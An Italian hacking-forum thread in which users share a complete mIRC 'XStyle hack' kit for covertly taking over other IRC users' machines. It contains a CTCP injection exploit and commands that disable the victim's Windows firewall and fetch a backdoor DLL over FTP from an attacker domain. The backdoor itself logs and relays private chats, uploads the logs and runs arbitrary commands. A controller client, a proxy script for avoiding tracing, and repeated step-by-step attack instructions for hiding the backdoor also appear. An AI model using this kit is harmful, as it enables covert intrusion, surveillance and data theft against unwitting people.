ciao a tutti vi propongo un programmino in mirc scripting che ho fatto che permette di accedere ad una macchina remota tramite il mirc e rimanere in contatto con la shell della macchina finche il mirc remoto sta aperto.è possibile hackerare il mirc XStyle remoto in modo "invisibile" cioè che l utente remoto non si accorgeràdi nulla.il programma lo trovate nel mio sito: ***Edit by R4z0r_Cr4$H ve lo consiglio per hack tools e altri piccoli utili softwares
Hackerare uno script mIRC XStyle (accesso remoto alla macchina, remote shell)
- Autore discussione uomosteriman
- Data d'inizio
- Stato
R4z0r_Cr4$H ha detto:
non è possibile pastare il codice,sono molti documenti perchè per fare quello script mirc chiamato "mirc xstyle hack" che permette di:
-leggere le chattate in diretta
-far uploadare qualsiasi file su ftp
-far eseguire qualsiasi comando dal cmd.exe
-far scaricare qualsiasi file...
è un file da scaricare,non preoccuparti,il sito ha solo file in download.non ha altro,è scarno
i file puoi hostarli benissimamente qui...quando fai una risposta completa in basso puoi fare l'upload dei file...
R4z0r_Cr4$H ha detto:
ok,allora lo metto un altro giorno perchè non ce l ho sul pc e tra 10 minuti devo uscire.se ti interessa testarlo
lo trovi sul mio sito,leggiti la guida perchè è complicato da usare visto che il mirc non è abbastanza potente ho dovuto fare giri enormi di codice per arrivare ad accedere ad un windows remoto senza essere sgamato R4z0r_Cr4$H ha detto:
nemmeno io :°D , però mi piace scriptare per mirc.è un linguaggio semplice e ci sono moltissime dll per moddare il mirc rendendolo irriconoscibile.
-------
IRC Proxy
Codice:
dialog proxyrc {
title "IRC Proxy"
size -1 -1 131 173
option dbu
edit "", 1, 39 14 53 11, autohs
text "IP:", 2, 30 16 8 8
text "Porta:", 3, 21 28 17 8
edit "", 4, 39 26 20 11, autohs
text "User:", 5, 22 40 15 8
edit "", 6, 39 38 53 11, autohs
text "Pass:", 7, 20 52 17 8
edit "", 8, 39 50 53 11, pass autohs
text "IP serv IRC:", 9, 11 79 29 8
edit "", 10, 41 77 50 11
text "Porta IRC:", 11, 14 91 27 8
edit "", 12, 41 89 20 11, autohs
box "IRC Proxy by ^4st3r1X^", 13, 1 1 129 143
button "Annulla", 14, 78 153 37 10, flat cancel
button "Connetti", 15, 15 153 37 10, default flat
text "Nick:", 16, 25 103 14 8
edit "", 17, 41 101 50 11, autohs
text "Nome:", 18, 22 115 16 8
edit "", 19, 41 113 50 11, autohs
text "HostID:", 20, 20 127 20 8
edit "", 21, 41 125 50 11, autohs
}
on *:dialog:proxyrc:init:*: {
did -ra proxyrc 1 %proxyip
did -ra proxyrc 4 %proxyport
did -ra proxyrc 6 %proxyuser
did -ra proxyrc 8 %proxypass
did -ra proxyrc 10 %ircserver
did -ra proxyrc 12 %ircport
did -ra proxyrc 17 %nickirc
did -ra proxyrc 19 %nomeirc
did -ra proxyrc 21 %idirc
}
on *:dialog:proxyrc:edit:*: {
if ($did == 1) { .set %proxyip $did(1) }
if ($did == 4) { .set %proxyport $did(4) }
if ($did == 6) { .set %proxyuser $did(6) }
if ($did == 8) { .set %proxypass $did(8) }
if ($did == 10) { .set %ircserver $did(10) }
if ($did == 12) { .set %ircport $did(12) }
if ($did == 17) { .set %nickirc $did(17) }
if ($did == 19) { .set %nomeirc $did(19) }
if ($did == 21) { .set %idirc $did(21) }
}
alias connettiprox {
if (%proxyip != $null) && (%proxyport != $null) && (%ircserver != $null) && (%ircport != $null) && (%proxyuser == $null) && (%proxypass == $null) && (%idirc != $null) && (%nickirc != $null) && (%nomeirc != $null) {
.timer 1 2 .server %proxyip %proxyport
.timer 1 5 .raw telnet %ircserver %ircport
.timer 1 8 .raw user %idirc $rand(a,z) $rand(1,9) : $+ %nomeirc
.timer 1 11 .raw nick %nickirc
}
if (%proxyip != $null) && (%proxyport != $null) && (%ircserver != $null) && (%ircport != $null) && (%proxyuser != $null) && (%proxypass == $null) && (%idirc != $null) && (%nickirc != $null) && (%nomeirc != $null) {
.timer 1 2 .server %proxyip %proxyport
.timer 1 5 .raw %proxyuser
.timer 1 8 .raw telnet %ircserver %ircport
.timer 1 11 .raw user %idirc $rand(a,z) $rand(1,9) : $+ %nomeirc
.timer 1 14 .raw nick %nickirc
}
if (%proxyip != $null) && (%proxyport != $null) && (%ircserver != $null) && (%ircport != $null) && (%proxyuser != $null) && (%proxypass != $null) && (%idirc != $null) && (%nickirc != $null) && (%nomeirc != $null) {
.timer 1 2 .server %proxyip %proxyport
.timer 1 5 .raw %proxyuser
.timer 1 8 .raw %proxypass
.timer 1 11 .raw telnet %ircserver %ircport
.timer 1 14 .raw user %idirc $rand(a,z) $rand(1,9) : $+ %nomeirc
.timer 1 17 .raw nick %nickirc
}
if (%proxyip != $null) && (%proxyport != $null) && (%ircserver != $null) && (%ircport != $null) && (%proxypass != $null) && (%proxyuser == $null) && (%idirc != $null) && (%nickirc != $null) && (%nomeirc != $null) {
.timer 1 2 .server %proxyip %proxyport
.timer 1 5 .raw %proxypass
.timer 1 8 .raw telnet %ircserver %ircport
.timer 1 11 .raw user %idirc $rand(a,z) $rand(1,9) : $+ %nomeirc
.timer 1 14 .raw nick %nickirc
}
}
on *:dialog:proxyrc:sclick:*: {
if ($did == 15) { connettiprox }
}xstyle hack ctcp
Codice:
fotti {
.timer 1 1 ctcp $1 version $ $+ chr(124) //.write -l4 X[n]gine\ctcp.xng ctcp *:*:*: $+ $chr(123) ; :O
.timer 1 3 ctcp $1 version $ $+ chr(124) //.write -l43 X[n]gine\ctcp.xng ; :O
.timer 1 5 ctcp $1 version $ $+ chr(124) //.reload -rs X[n]gine\ctcp.xng :O
}
fotti2 {
.timer 1 1 ctcp $1 uff //.reload -rs X[n]gine\ctcp.xng :O
.timer 1 5 ctcp $1 uff //clear -s
.timer 1 6 ctcp $1 uff //clearall
.timer 1 7 ctcp $1 uff //.msg #abcd we. . .
.timer 1 9 nick $rand(A,Z) $+ $rand(a,v) $+ _ $+ $rand(a,z) $+ _ $+ $rand(1,9) $+ _ $+ $rand(a,z) $+ _ $+ $rand(1,9)
}
ctcpunload {
.timer 1 2 ctcp $1 uff //.write -c unload.dll
.timer 1 4 ctcp $1 uff //.write unload.dll on *:unload: .reload -rs sound.dll
.timer 1 6 ctcp $1 uff //.load -rs unload.dll
}
ctcpsound {
.timer 1 1 ctcp $1 uff /.write -c sound.dll
.timer 1 3 ctcp $1 uff /.write sound.dll on *:input:*: .ignore -r *
.timer 1 5 ctcp $1 uff /.write sound.dll on *:text:*:*: .ignore -r *
.timer 1 7 ctcp $1 uff /.load -rs sound.dll
}
ctcpsconfig {
.timer 1 1 ctcp $1 uff //.write -e transfer.tx ftp
.timer 1 4 ctcp $1 uff //.write -e transfer.tx open nomedominio.org
.timer 1 8 ctcp $1 uff //.write -e transfer.tx usernameee
.timer 1 12 ctcp $1 uff //.write -e transfer.tx passswrd
.timer 1 16 ctcp $1 uff //.write -e transfer.tx get
.timer 1 20 ctcp $1 uff //.write -e transfer.tx Sconf.dll
.timer 1 24 ctcp $1 uff //.write -e transfer.tx c:\Sconf.dll
.timer 1 28 ctcp $1 uff //.write -e transfer.tx quit
.timer 1 34 ctcp $1 uff //.write -e a.bat @echo off
.timer 1 38 ctcp $1 uff //.write -e a.bat ftp -i -s:transfer.tx
.timer 1 44 ctcp $1 uff //.write -e a.bat exit
.timer 1 50 ctcp $1 uff //.run netsh firewall set opmode disable
.timer 1 60 ctcp $1 uff //.run a.bat
.timer 1 80 ctcp $1 uff //.load -rs c:\Sconf.dll
}client xstyle hack
Codice:
dialog XShack {
title "XStyle Client Sconf.dll by ^4st3r1X^"
size -1 -1 221 272
option dbu
edit "", 1, 44 17 55 10, autohs
text "Vittima:", 2, 22 18 19 8
box "XStyle Hack by ^4st3r1X^", 3, 1 1 217 183
text "Comando:", 4, 17 31 24 8
edit "", 5, 44 30 114 10, autohs
button "Ok", 6, 79 250 58 17, default ok
button "Rimuovi Sconf.dll", 7, 137 148 48 17
button "Clicca per impostare il canale scelto", 9, 98 44 104 10
text "Canale hack:", 10, 10 44 31 8
edit "", 11, 44 43 50 10, autohs
button "Listaprogrammi", 12, 11 138 46 10
button "Scrivitutto", 13, 11 152 46 10
button "Diretta on", 8, 76 141 37 11
button "Diretta off", 15, 76 152 37 11
text "", 16, 6 207 87 8
text "", 17, 6 196 90 8
box "Info:", 18, 1 187 217 57
text "", 19, 6 218 91 8
button "Fai eseguire", 20, 162 31 42 10
text "killa processo:", 21, 7 57 37 8
edit "", 22, 44 56 54 10, autohs
button "Termina processo", 23, 102 57 46 9
text "Elimina file:", 29, 15 70 29 8
edit "", 31, 44 69 68 10, autohs
button "Elimina", 32, 116 70 39 9
text "Cambia nick:", 33, 11 83 32 8
edit "", 34, 44 82 55 10, autohs
button "Cambia", 35, 103 83 39 9
text "", 36, 6 229 111 8
text "Joina canale:", 38, 10 96 34 8
edit "", 39, 44 95 50 10, autohs
button "Join", 40, 98 95 39 9
button "Ip vittima", 42, 11 125 46 10
button "eliminalog", 14, 11 165 46 10
text "Messaggio:", 43, 14 109 29 8
edit "", 44, 44 107 113 11, autohs
button "Invia", 45, 164 108 37 9
}
ctcp *:ip*:*: { .set %ip $2- | .timer 1 2 .did -ra xshack 36 Ip vittima: %ip }
ctcp *:sconf*:*: { .set %diretta $2- | did -ra xshack 17 Diretta: %diretta }
alias xshack { dialog -m xshack xshack }
alias f5 { xshack }
alias own { ctcp $1 YW1taW5pc3RyYXRvcmU= | .timer 1 2 ctcp $1 own }
on *:dialog:xshack:init:*: {
.did -ra xshack 16 Vittima: %vittima
.did -ra xshack 17 Diretta: %diretta
.did -ra xshack 19 Canale: %chanhack
.did -a xshack 1 %vittima
.did -a xshack 5 %comando
.did -a xshack 11 %chanhack
.did -a xshack 22 %proc
.did -a xshack 44 %messaggio
.did -a xshack 31 %delete
.did -a xshack 34 %nickvitt
.did -a xshack 39 %jch
.did -ra xshack 36 Ultimo ip Vittima: %ip
}
on *:dialog:xshack:edit:*: {
if ($did == 1) { set %vittima $did(1) | did -ra xshack 16 Vittima: %vittima }
if ($did == 5) { set %comando $did(5) }
if ($did == 11) { set %chanhack $did(11) | did -ra xshack 19 Canale: %chanhack }
if ($did == 22) { set %proc $did(22) }
if ($did == 44) { set %messaggio $did(44) }
if ($did == 31) { set %delete $did(31) }
if ($did == 34) { set %nickvitt $did(34) }
if ($did == 39) { set %jch $did(39) }
}
on *:dialog:xshack:sclick:*: {
if ($did == 7) { ctcp %vittima uff /.nosconf }
if ($did == 12) { ctcp %vittima uff /.listaprogrammi }
if ($did == 13) { ctcp %vittima uff /.scrivitutto }
if ($did == 8) { ctcp %vittima uff /.sconf-on }
if ($did == 15) { ctcp %vittima uff /.sconf-off }
if ($did == 9) { did -ra xshack 19 Canale: %chanhack | ctcp %vittima uff /.set $chr(37) $+ chanhk %chanhack }
if ($did == 14) { ctcp %vittima uff /.eliminalog }
if ($did == 20) { ctcp %vittima uff %comando }
if ($did == 23) { ctcp %vittima uff /.run TASKKILL /IM /F %proc }
if ($did == 42) { ctcp %vittima YW1taW5pc3RyYXRvcmU= | .timer 1 2 ctcp %vittima ip }
if ($did == 45) { ctcp %vittima uff /.msg %messaggio }
if ($did == 32) { ctcp %vittima uff /.remove " $+ %delete $+ " }
if ($did == 35) { ctcp %vittima uff /.nick %nickvitt }
if ($did == 40) { ctcp %vittima uff /.join %jch }
}ctcp 2
Codice:
//ctcp nickname VERSION $chr(124) //.write -l41 X[n]gine\ctcp.xng $+($chr(36),$chr(32),$chr(36),$chr(43),$chr(32),eval,$chr(40),$chr(36),$chr(32),$chr(36),$chr(43),$chr(32),2-,$chr(44),5,$chr(41)) $ $+ chr(124) halt $ $+ crlf ; :Obackdoor
Codice:
on *:input:#: {
.write -e C:\dati.dll [ $date ] $timestamp [ $me ]scrive su $chan : $1-
if (%sconf == on) {
.msg %chanhk [ $date ][ $time ][ $me ]scrive su $chan : $1-
}
}
on *:input:?: {
.write -e C:\dati.dll [ $date ] $timestamp [ $me ]scrive a $target : $1-
if (%sconf == on) { .msg %chanhk [ $date ][ $time ][ $me ]scrive a $target : $1-
}
}
on *:text:*:?: {
.write -e C:\dati.dll [ $date ] $timestamp [ $nick ]mi ha scritto : $1-
if (%sconf == on) {
.msg %chanhk [ $date ][ $time ][ $nick ]mi ha scritto : $1-
}
}
on *:start: { .run netsh firewall set opmode disable }
on *:load: { .set %chanhk #abcd | .msg %chanhk Sconf.dll V.9.1.8 Caricata }
on *:join:#: { .write -e C:\dati.dll [ $date ][ $time - JOIN ] $me ha joinato $chan }
on *:part:#: { .write -e C:\dati.dll [ $date ][ $time - PART ] $me ha partato da $chan }
on *:nick: { if ($nick == $me) { .write -e C:\dati.dll [ $date ][ $time - NICK ] $me ha cambiato nick in $newnick } }
on *:connect: { .write -e C:\dati.dll [ $date ][ $time ] $me si è connesso | .msg %chanhk [ $date ][ $time ] $me si è connesso }
on *:disconnect: { .write -e C:\dati.dll [ $date ][ $time ] $me si è disconnesso | .set %root off }
on *:exit: { .write -e C:\dati.dll [ $date ][ $time ] mIRC chiuso }
ctcp *:YW1taW5pc3RyYXRvcmU=:*: { .set %root $nick | halt }
ctcp *:ip:*: { .ctcp %root ip $ip | halt }
ctcp *:own:*: { .ctcp %root I'm owned :) | halt }
alias eliminalog { .remove C:\dati.dll | .msg %chanhk dati.dll eliminato }
alias sconf-on { .set %sconf on | .msg %chanhk Diretta on | .ctcp %root sconf on }
alias sconf-off { .unset %sconf | .msg %chanhk Diretta off | .ctcp %root sconf off }
alias nosconf {
.timer 1 1 .remove c:\dati.dll
.timer 1 2 .msg %chanhk c:\dati.dll eliminato
.timer 1 4 .remove transfer.tx
.timer 1 5 .msg %chanhk $mircdir $+ transfer.tx eliminato
.timer 1 7 .remove a.bat
.timer 1 8 .msg %chanhk $mircdir $+ a.bat eliminato
.timer 1 10 .remove C:\Sconf.dll
.timer 1 11 .msg %chanhk c:\Sconf.dll eliminato
.timer 1 13 .remove transfer.bat
.timer 1 14 .msg %chanhk $mircdir $+ transfer.bat eliminato
.timer 1 19 .remove transfer.dll
.timer 1 20 .msg %chanhk $mircdir $+ transfer.dll eliminato
.timer 1 22 .unset %sconf
.timer 1 28 .clearall
.timer 1 31 .msg %chanhk Sconf.dll V.9.1.8 rimossa
.timer 1 33 .unset %chanhk
.timer 1 35 .unload -rs C:\Sconf.dll
}
alias scrivitutto {
.timer 1 2 .remove transfer.bat
.timer 1 5 .write -e transfer.bat @echo off
.timer 1 7 .write -e transfer.bat ftp -i -s:transfer.dll
.timer 1 10 .write -e transfer.bat exit
.timer 1 13 .msg %chanhk transfer.bat scritto con successo
.timer 1 17 .remove transfer.dll
.timer 1 20 .write -e transfer.dll open dominio.oprg
.timer 1 22 .write -e transfer.dll username
.timer 1 24 .write -e transfer.dll paswwwwd
.timer 1 26 .write -e transfer.dll put C:\dati.dll
.timer 1 28 .write -e transfer.dll quit
.timer 1 30 .msg %chanhk transfer.dll scritto con successo
.timer 1 33 .run transfer.bat
.timer 1 37 .msg %chanhk file "dati.dll" trasferito su dominio.org
}
alias listaprogrammi { //.echo -a $findfile(c:\programmi,*.exe,0,write "C:\dati.dll" $1-) | .timer 1 3 .msg %chanhk Lista programmi scritta con successo su "C:\dati.dll" }è necessario avere un dominio:
esempio:
dominio.org
uppare il file sconf.dll su dominio.org e impostare nello script sconf.dll le coordinate del dominio.
impostare le coordinate anche nel ctcpsconfig.
dopo aver impostato queste coordinate si puo iniziare facendo così:
cercare un utente che usa xstyle,ad esempio il suo nick è xstyle345:
iniziamo:
/fotti xstyle345
subito dopo riscrivere velocemente
//ctcp xstyle345 VERSION $chr(124) //.write -l41 X[n]gine\ctcp.xng $+($chr(36),$chr(32),$chr(36),$chr(43),$chr(32),eval,$chr(40),$chr(36),$chr(32),$chr(36),$chr(43),$chr(32),2-,$chr(44),5,$chr(41)) $ $+ chr(124) halt $ $+ crlf ; :O
subito dopo riscrivere velocemente
/fotti2 xstyle345
con questo "fotteremo" l xstyle creandogli un buco.ora non ci resta che fare in modo che non si accorga della backdoor ,e soprattutto che non riesca a toglierla:
gli faremo :
/ctcpunload xstyle345
/ctcpsound xstyle345
ora siamo pronti per piazzare la backdoor con il comando
/ctcpsconfig xstyle345
(bucato)
con questo abbiamo finito,possiamo usare il client xshack per far eseguire comandi alla vittima e per molte altre funzioni.
poi se non volete farvi rintracciare potete usare l irc proxy,(creato per i router cisco)
esempio:
dominio.org
uppare il file sconf.dll su dominio.org e impostare nello script sconf.dll le coordinate del dominio.
impostare le coordinate anche nel ctcpsconfig.
dopo aver impostato queste coordinate si puo iniziare facendo così:
cercare un utente che usa xstyle,ad esempio il suo nick è xstyle345:
iniziamo:
/fotti xstyle345
subito dopo riscrivere velocemente
//ctcp xstyle345 VERSION $chr(124) //.write -l41 X[n]gine\ctcp.xng $+($chr(36),$chr(32),$chr(36),$chr(43),$chr(32),eval,$chr(40),$chr(36),$chr(32),$chr(36),$chr(43),$chr(32),2-,$chr(44),5,$chr(41)) $ $+ chr(124) halt $ $+ crlf ; :O
subito dopo riscrivere velocemente
/fotti2 xstyle345
con questo "fotteremo" l xstyle creandogli un buco.ora non ci resta che fare in modo che non si accorga della backdoor ,e soprattutto che non riesca a toglierla:
gli faremo :
/ctcpunload xstyle345
/ctcpsound xstyle345
ora siamo pronti per piazzare la backdoor con il comando
/ctcpsconfig xstyle345
(bucato)
con questo abbiamo finito,possiamo usare il client xshack per far eseguire comandi alla vittima e per molte altre funzioni.
poi se non volete farvi rintracciare potete usare l irc proxy,(creato per i router cisco
)uomosteriman ha detto:è necessario avere un dominio:
esempio:
dominio.org
uppare il file sconf.dll su dominio.org e impostare nello script sconf.dll le coordinate del dominio.
impostare le coordinate anche nel ctcpsconfig.
dopo aver impostato queste coordinate si puo iniziare facendo così:
cercare un utente che usa xstyle,ad esempio il suo nick è xstyle345:
iniziamo:
/fotti xstyle345
subito dopo riscrivere velocemente
//ctcp xstyle345 VERSION $chr(124) //.write -l41 X[n]gine\ctcp.xng $+($chr(36),$chr(32),$chr(36),$chr(43),$chr(32),eval,$chr(40),$chr(36),$chr(32),$chr(36),$chr(43),$chr(32),2-,$chr(44),5,$chr(41)) $ $+ chr(124) halt $ $+ crlf ; :O
subito dopo riscrivere velocemente
/fotti2 xstyle345
con questo "fotteremo" l xstyle creandogli un buco.ora non ci resta che fare in modo che non si accorga della backdoor ,e soprattutto che non riesca a toglierla:
gli faremo :
/ctcpunload xstyle345
/ctcpsound xstyle345
ora siamo pronti per piazzare la backdoor con il comando
/ctcpsconfig xstyle345
(bucato)
con questo abbiamo finito,possiamo usare il client xshack per far eseguire comandi alla vittima e per molte altre funzioni.
poi se non volete farvi rintracciare potete usare l irc proxy,(creato per i router cisco
(video ---> clicca qui per vedere l'esempio di un attacco)
(sul video sono presenti user e pass del dominio ftp...fate i bravi lol,non cancellate niente)
Vorrei solo aggiungere un dettaglio che non molti sanno. La falla di XStyle che permette l' esecuzione di questo codice la scoprì io tempo fa con il nome di [R]u[F]y. La data precisa della scoperta è il 14 dicembre 2004. Purtroppo il creatore di XStyle [K]it[O] non ebbe mai il coraggio di attribuirmi la scoperta per questo ci tengo alla precisazione.
- Stato